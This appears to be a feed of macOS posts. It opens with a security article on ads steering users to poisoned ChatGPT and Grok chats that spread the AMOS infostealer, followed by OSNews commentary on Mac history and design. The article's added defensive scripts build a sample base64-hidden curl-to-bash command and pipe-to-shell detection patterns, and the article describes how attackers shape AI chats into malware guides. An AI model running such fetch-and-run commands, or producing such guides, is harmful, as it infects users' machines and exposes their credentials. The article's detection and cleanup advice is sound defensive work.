
Google ads funnel Mac users to poisoned AI chats that spread the AMOS infostealer

12 December 2025 at 09:26

Researchers have found evidence that AI conversations were inserted in Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.

Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.

The search results led to AI conversations which provided clearly laid out instructions to run a command in the macOS Terminal. That command would end with the machine being infected with the AMOS malware.

If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.

As the researchers pointed out:

“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”

This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. And because the command runs directly from the command line, it can bypass normal file download protections and execute anything the attacker wants.

Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.

So how does this work?

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide which in reality will infect a system. ChatGPT’s sharing feature creates a public link to a single conversation that exists in the owner’s account. Attackers can craft a chat to produce the instructions they need and then tidy up the visible conversation so that what’s shared looks like a short, clean guide rather than a long back-and-forth.

Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.

Then the criminals either pay for a sponsored search result pointing to the shared conversation or they use SEO techniques to get their posts high in the search results. Sponsored search results can be customized to look a lot like legitimate results. You’ll need to check who the advertiser is to find out it’s not real.

[Image: sponsored ad for ChatGPT Atlas which looks very real. Image courtesy of Kaspersky.]

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.

How to stay safe

These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.

  • First and foremost, and I can’t say this often enough: Don’t click on sponsored search results. We have seen so many cases where sponsored results lead to malware that we recommend skipping them or making sure you never see them. At best they cost the company you looked for money and at worst you fall prey to imposters.
  • If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.
  • Use real-time anti-malware protection, preferably one that includes a web protection component.
  • Never run copy-pasted commands from random pages or forums, even if they’re hosted on seemingly legitimate domains, and especially not commands that look like curl … | bash or similar combinations.
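
One way to review a copy-pasted command before it goes anywhere near Terminal, shown as an added example that is not part of the original article: the Python sketch below decodes base64-looking tokens and flags pipe-to-shell patterns without executing or fetching anything. The sample command, the `example.invalid` host and the function names are constructed for illustration.

```python
import base64
import binascii
import re

# Long runs of base64 alphabet characters; short ordinary words are ignored.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"https?://[^\s\"'|;)]+")
# Output of another command piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b")


def hidden_strings(command):
    """Decode base64-looking tokens and keep those that yield printable text."""
    decoded = []
    for token in B64_TOKEN.findall(command):
        padded = token + "=" * (-len(token) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8").strip()
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or not text once decoded
        if text and text.isprintable():
            decoded.append(text)
    return decoded


def inspect_command(command):
    """Statically review a pasted command; nothing is executed or fetched."""
    hidden_urls = [u for text in hidden_strings(command) for u in URL.findall(text)]
    piped = bool(PIPE_TO_SHELL.search(command))
    return {
        "pipe_to_shell": piped,
        "visible_urls": URL.findall(command),
        "hidden_urls": hidden_urls,
        "suspicious": piped or bool(hidden_urls),
    }


# Constructed sample in the shape the article describes (placeholder host).
SAMPLE_URL = "https://example.invalid/install.sh"
SAMPLE = 'curl -fsSL "$(echo %s | base64 -d)" | bash' % (
    base64.b64encode(SAMPLE_URL.encode()).decode()
)
BENIGN = "du -sh ~/Library/Caches"

if __name__ == "__main__":
    for cmd in (SAMPLE, BENIGN):
        print(cmd, "->", inspect_command(cmd))
```

A clean result only means these two patterns were not found; it does not make a command safe to run.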

If you’ve scanned your Mac and found the AMOS information stealer:

  • Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
  • If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
  • After reinstalling, check for additional rogue browser extensions, cryptowallet apps, and system modifications.
  • Change all the passwords that were stored on the affected system and enable multi-factor authentication (MFA) for your important accounts.
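
To support the review of LaunchAgents and LaunchDaemons in the first step above, here is an added inventory example (not from the original article) that lists every launchd job definition in the standard Library folders, newest first, so recently installed items stand out. It only reads files; deciding what is suspicious remains a manual judgement, and the field names in the returned dictionaries are this example's own.

```python
import os
import plistlib
from datetime import datetime
from pathlib import Path

# Standard per-user and system-wide launchd folders on macOS.
LAUNCHD_DIRS = [
    Path(os.path.expanduser("~/Library/LaunchAgents")),
    Path("/Library/LaunchAgents"),
    Path("/Library/LaunchDaemons"),
]


def list_launch_items(dirs=LAUNCHD_DIRS):
    """Return launchd job definitions found in dirs, most recently modified first."""
    items = []
    for directory in map(Path, dirs):
        if not directory.is_dir():
            continue
        for path in directory.glob("*.plist"):
            try:
                with path.open("rb") as fh:
                    job = plistlib.load(fh)  # handles XML and binary plists
            except Exception:
                job = {}  # unreadable or malformed: still listed for review
            if not isinstance(job, dict):
                job = {}
            command = job.get("ProgramArguments") or [job.get("Program", "?")]
            items.append({
                "path": str(path),
                "label": job.get("Label", "?"),
                "command": " ".join(map(str, command)),
                "run_at_load": bool(job.get("RunAtLoad", False)),
                "modified": datetime.fromtimestamp(path.stat().st_mtime),
            })
    return sorted(items, key=lambda item: item["modified"], reverse=True)


if __name__ == "__main__":
    for item in list_launch_items():
        print(item["modified"].isoformat(timespec="seconds"),
              item["label"], "->", item["command"], f"({item['path']})")
```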

If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team is happy to assist you if you have any concerns.



The anatomy of a macOS application

8 December 2025 at 06:52

When Mac OS X was designed, it switched to the bundle structure inherited from NeXTSTEP. Instead of this multitude of resources, apps consisted of a hierarchy of directories containing files of executable code, and those with what had in Mac OS been supporting resources. Those app bundles came to adopt a standard form, shown below.

↫ Howard Oakley

A short, but nonetheless informative overview of the structure of a macOS application. I’m sure most people on OSNews are aware that a macOS application is a bundle, which is effectively a glorified directory containing a variety of files and subdirectories that together make up the application. I haven’t used macOS in a while, but I think you can right-click on an application and open it as a folder to dig around inside of it.

I’m trying to remember from my days as a Mac OS X user – 15-20 years ago – if there was ever a real need to do so, but I’m sure there were a few hacks you could do by messing around with the files inside of application bundles. These days, perhaps with all the code-signing, phoning-home to Apple, and other security trickery going on, such acts are quite frowned upon. Does making any otherwise harmless changes inside an application bundle set off a ton of alarm bells in macOS these days?

MacOS: losing confidence

3 December 2025 at 16:34

It’s always a bit sad and a little awkward when reality starts hitting long-time fans and users of an operating system, isn’t it? I feel like I’m at least fifteen years ahead of everyone else when it comes to macOS, at least.

Over the last few weeks I’ve been discovering problems that have been eroding confidence in macOS. From text files that simply won’t show up in Spotlight search, to Clock timers that are blank and don’t function, there’s one common feature: macOS encounters an error or fault, but doesn’t report that to the user, instead just burying it deep in the log.

When you can spare the time, the next step is to contact Apple Support, who seem equally puzzled. You’re eventually advised to reinstall macOS or, in the worst case, to wipe a fairly new Apple silicon Mac and restore it in DFU mode, but have no reason to believe that will stop the problem from recurring. You know that Apple Support doesn’t understand what’s going wrong, and despite the involvement of support engineers, they seem as perplexed as you.

↫ Howard Oakley

I remember when Mac OS X was so far ahead of the competition it was honestly a little tragic. Around the late PowerPC and very early Intel days, when the iPhone hadn’t yet had the impact on the company it has now, the Mac and its operating system were the star of the company’s show, and you felt it when you used it. Even though the late PowerPC hardware was being outpaced left, right, and centre by Intel and AMD hardware in virtually every sense, Mac OS X more than made up for it by being a carefully and lovingly crafted operating system designed and developed by people who clearly deeply cared.

I used nothing but Macs as a result.

These days, everything’s reversed. By all accounts, Macs are doing amazing hardware-wise, with efficient, powerful processors and solid design. The operating system, however, has become a complete and utter mess, showing us that no, merely having great hardware does not make up for shit software in the same way the reverse was true two decades ago. I’d rather use a slower, hotter laptop with great software than a faster, cooler laptop with terrible software.

I’m not sure we’re going to see this trend reversed any time soon. Apple, too, is chasing the dragon, and everything the company does is designed around their cash cow, and I just don’t see how that’s going to change without a complete overhaul of the company’s leadership.

System 7 natively boots on the Mac Mini G4

30 November 2025 at 03:28

Only a few weeks ago, the CHRP variants of Mac OS 7.6 and 8 were discovered and uploaded to the internet for posterity, but we’re already seeing the positive results of this event unfold: Mac OS 7.x can now run on the Mac Mini G4 – natively.

The very short of it is as follows. First, the CHRP release of Mac OS 8 contains a ROM file that allows Mac OS 8 to boot on the G4 Mac Mini. Second, the CHRP release of 7.6 contains a System Enabler that allows 7.6 and earlier versions to run by using the aforementioned ROM file. Third, the ROM has been modified to add compatibility with as many Mac models as possible. There’s a lot more to it, of course, but the end result is that quite a few more older, pre-9.x versions of Mac OS can now run on G4 and G3 Macs, which is quite cool.

Of course, there are limitations.

Note that, although I describe many of these as “stable”, I mean you can use much of it normally (sound/video/networking aside) without it crashing or misbehaving, at least not too hard, but that is not to say everything works, because that is just not the case. For example, when present, avoid opening the Apple System Profiler, unless you want a massive crash as it struggles trying to profile and gather all the information about your system. Some other apps or Control Panels might either not work, or work up to a certain point, after which they might freeze, requiring you to Force Quit the Finder to keep on going. And so on.

↫ Jubadub at Mac OS 9 Lives

Issues or no, this is amazing news, and great work by all involved.

Mac OS 7.6 and 8 for CHRP releases discovered

9 November 2025 at 14:59

For those of us unaware – unlikely on OSNews, but still – for a hot minute in the second half of the ’90s, Apple licensed its Mac OS to OEMs, resulting in officially sanctioned Mac clones from a variety of companies. While intended to grow the Mac’s market share, what ended up happening instead is that the clone makers outcompeted Apple on performance, price, and features, with clones offering several features and capabilities before Apple did – for far lower prices. When Steve Jobs returned to Apple, he killed the clone program almost instantly.

The rather abrupt end of the clone program means there’s a number of variants of the Mac OS that never made their way into the market, most notably variants intended for the Common Hardware Reference Platform, or CHRP, a standard defined by IBM and Apple for PowerPC-based PCs. Thanks to the popular classic Mac YouTuber Mac84, we now have a few of these releases out in the wild.

These CDs contain release candidates for Mac OS 7.6 and Mac OS 8 for CHRP (Common Hardware Reference Platform) systems. They were created to support CHRP computers, but were never released, likely due to Steve Jobs returning to Apple in September 1997 and eliminating the Mac Clone program and any CHRP efforts.

↫ Mac OS 7.6/8 CHRP releases page

Mac84 has an accompanying video diving into more detail about these individual releases by booting and running them in an emulator, so we can get a better idea of what they contain.

While most clone makers only got access to Mac OS 7.x, some of them did, in fact, gain access to Mac OS 8, namely UMAX and Power Computing (the latter of which was acquired by Apple). It’s not the clone nature of these releases that makes them special, but the fact they’re CHRP releases. This reference platform was a failure in the market, and only a few of IBM’s own machines and some of Motorola’s PowerStack machines properly supported it. Apple, meanwhile, only paid minor lip service to CHRP in its New World Power Macintosh machines.

MacOS 26’s new icons are a step backwards

6 November 2025 at 13:51

On the new MacOS 26 (Tahoe), Apple has mandated that all application icons fit into their prescribed squircle. No longer can icons have distinct shapes, nor even any fun frame-breaking accessories. Should an icon be so foolish as to try to have a bit of personality, it will find itself stuffed into a dingy gray icon jail.

↫ Paul Kafasis

The downgraded icons listed in this article are just… Sad. While there’s no accounting for tastes, Apple’s new glassy icons are just plain bad, void of any whimsy, and lacking in artistry. Considering where Apple came from back when it made beautifully crafted icons that set the bar for the entire industry.

Almost seems like a metaphor for tech in general.

Benjamin Button reviews macOS

23 September 2025 at 18:27

Apple’s first desktop operating system was Tahoe. Like any first version, it had a lot of issues. Users and critics flooded the web with negative reviews. While mostly stable under the hood, the outer shell — the visual user interface — was jarringly bad. Without much experience in desktop UX, Apple’s first OS looked like a Fisher-Price toy: heavily rounded corners, mismatched colors, inconsistent details and very low information density. Obviously, the tool was designed mostly for kids or perhaps light users or elderly people.

Credit where credit is due: Apple had listened to their users and the next version – macOS Sequoia — shipped with lots of fixes. Border radius was heavily reduced, transparent glass-like panels replaced by less transparent ones, buttons made more serious and less toyish. Most system icons made more serious, too, with focus on more detail. Overall, it seemed like the 2nd version was a giant leap from infancy to teenage years.

↫ Rakhim Davletkali

A top quality operating systems shitpost.
